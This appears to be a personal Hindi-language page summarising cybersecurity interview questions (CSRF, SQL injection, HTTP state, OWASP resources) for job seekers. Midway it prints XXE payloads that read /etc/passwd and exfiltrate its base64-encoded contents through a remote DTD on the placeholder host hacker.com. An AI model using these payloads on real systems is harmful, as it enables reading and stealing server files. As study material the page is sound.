
उन साइबर सुरक्षा साक्षात्कार प्रश्नों का सारांश जिनसे मैं गुज़रा हूँ, आशा है यह मददगार होगा।
यह पृष्ठ उन साक्षात्कारों का सारांश है जिनसे मैं गुज़रा हूँ, इसमें कई प्रकार की भूमिकाओं को शामिल किया गया, हालाँकि कई अस्वीकृतियाँ मिलीं, परंतु प्रत्येक साक्षात्कार से सीखा, रचनात्मक प्रतिक्रियाएँ एकत्र कीं और आगे बढ़ा। आशा है ये प्रश्न/ युक्तियाँ आपकी मदद कर सकें।
यह सामान्यतः निम्नलिखित भूमिकाओं को कवर करता है:
त्वरित सुझाव:
मैंने नीचे उन सभी संभावित प्रश्नों को लिखने का प्रयास किया है जिनका सामना मैंने किया, और कुछ के उत्तर भी दिए हैं। बाकी के लिए आप उनके विशिष्ट उत्तर गूगल कर सकते हैं, और यदि आप गहराई में जाना चाहें। इसके अलावा, अंत में कुछ संदर्भ हैं, उन पर एक नज़र अवश्य डालें। वे वास्तव में सहायक थे।
आगे बढ़ते हुए और अपने नोट्स जाँचते हुए मैं और प्रश्न जोड़ना चाहूँगा, तथापि यदि आप [email protected] के माध्यम से संपर्क करके इस पर मुझे रचनात्मक प्रतिक्रिया दे सकें तो मैं सराहना करूँगा। यदि आपको कुछ ऐसा मिला है जो यहाँ शामिल नहीं है, तो कृपया बेझिझक साझा करें।
CIA क्या है?
AAA क्या है?
OWASP Top 10
XSS (Cross-site Scripting) क्या है
CSRF क्या है
यह सबसे पसंदीदा प्रश्न है जिसे लगभग हर साक्षात्कारकर्ता पूछना पसंद करता है
त्वरित सुझाव: संक्षिप्त रहें, यदि पूछा जाए तभी पूरी बात समझाएँ
Cross-Site Request Forgery (CSRF) एक हमला है जो किसी अंतिम उपयोगकर्ता को उस वेब एप्लिकेशन पर अवांछित कार्य करने के लिए बाध्य करता है जिसमें वे वर्तमान में प्रमाणित (authenticated) हैं। CSRF हमले विशेष रूप से स्थिति-परिवर्तनकारी अनुरोधों (state-changing requests) को लक्षित करते हैं, डेटा की चोरी को नहीं, क्योंकि हमलावर के पास नकली अनुरोध के प्रत्युत्तर को देखने का कोई तरीका नहीं होता। सोशल इंजीनियरिंग की थोड़ी सी मदद से (जैसे ईमेल या चैट के माध्यम से लिंक भेजना), एक हमलावर वेब एप्लिकेशन के उपयोगकर्ताओं को धोखा देकर हमलावर द्वारा चुने गए कार्यों को करवा सकता है। यदि पीड़ित एक सामान्य उपयोगकर्ता है, तो एक सफल CSRF हमला उपयोगकर्ता को धन हस्तांतरण, ईमेल पता बदलना आदि जैसे स्थिति-परिवर्तनकारी अनुरोध करने के लिए बाध्य कर सकता है। यदि पीड़ित एक प्रशासनिक खाता है, तो CSRF पूरे वेब एप्लिकेशन से समझौता कर सकता है।
CSRF से कैसे निपटें:
Anti-CSRF टोकन का उपयोग करें
समान-मूल नीति (same-origin policy) का उपयोग करें
Referrer हेडर का उपयोग करें
HTML/ URL एन्कोडिंग क्या है
क्या HTTP प्रोटोकॉल स्टेटलेस (stateless) है?
HTTP स्वाभाविक रूप से स्टेटलेस प्रोटोकॉल है, हालाँकि सर्वर इसे स्टेटफुल बनाने के लिए कुकीज़ का उपयोग करता है
इंजेक्शन के प्रकार क्या हैं: SQL, Command, OS
SQL इंजेक्शन से कैसे निपटें
पैरामीटरयुक्त क्वेरी (parameterized queries) और संग्रहीत प्रक्रियाओं (stored procedures) का उपयोग करें
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
इंजेक्ट करने हेतु: document.xml
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
%remote; %intern; %xxe;
]>
<root>&xxe;</root> - you can change xxe entity to general entity
बाहरी होस्ट: http://hacker.com/evil.dtd
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
--- OR ---
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'file://%payl;'>"> - consider error-based
सामान्यतः AWS के संदर्भ में बात करूँगा, हालाँकि Azure, GCP, Digital Ocean आदि जैसे अन्य क्लाउड प्रदाता भी हैं।
सीखने के संसाधन:
https://regexone.com/ (Regular Expressions अनिवार्य हैं!)
https://portswigger.net/web-security/
OWASP Top 10:
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
इन्फोसेक साक्षात्कार प्रश्न:
https://danielmiessler.com/study/infosec_interview_questions
शीर्ष पेंटेस्ट प्रश्न:
https://resources.infosecinstitute.com/top-30-penetration-tester-pentester-interview-questions-and-answers-for-2019/#gref
पायथन युक्तियाँ:
https://www.codementor.io/sheena/essential-python-interview-questions-du107ozr6
AWS उपयोगकर्ता मार्गदर्शिका:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html
SMB और Samba की जानकारी:
https://fitzcarraldoblog.wordpress.com/2016/10/17/a-correct-method-of-configuring-samba-for-browsing-smb-shares-in-a-home-network/